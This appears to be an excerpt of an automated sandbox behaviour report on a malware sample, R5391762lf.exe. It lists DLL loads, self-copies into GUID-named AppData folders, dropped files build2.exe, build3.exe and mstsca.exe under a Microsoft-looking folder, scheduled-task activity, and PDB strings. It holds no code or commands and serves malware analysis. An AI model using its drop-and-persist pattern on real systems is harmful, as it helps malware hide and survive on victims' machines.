Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: drprov.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: ntlanman.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: davclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: davhlpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: browcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: drprov.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: ntlanman.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: davclnt.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: davhlpr.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: browcli.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: uxtheme.dll

Source: C:\Users\user\Desktop\R5391762lf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: R5391762lf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\41\\5bU)% source: R5391762lf.exe, 00000007.00000003.2101462932.0000000003691000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2100295097.000000000397E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2077993512.000000000391E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ m[%K source: R5391762lf.exe, 00000007.00000003.2081897313.000000000379F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2098573555.000000000379F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2100791102.000000000379F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2080641815.0000000003787000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2079360767.00000000036F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: R5391762lf.exe, 00000007.00000003.1681500127.0000000003386000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946799099.00000000033B3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682385197.000000000339B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1948192992.00000000033B7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1622139551.0000000003386000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1681962371.0000000003398000.00000004.00000020.00020000.00000000.sdmp
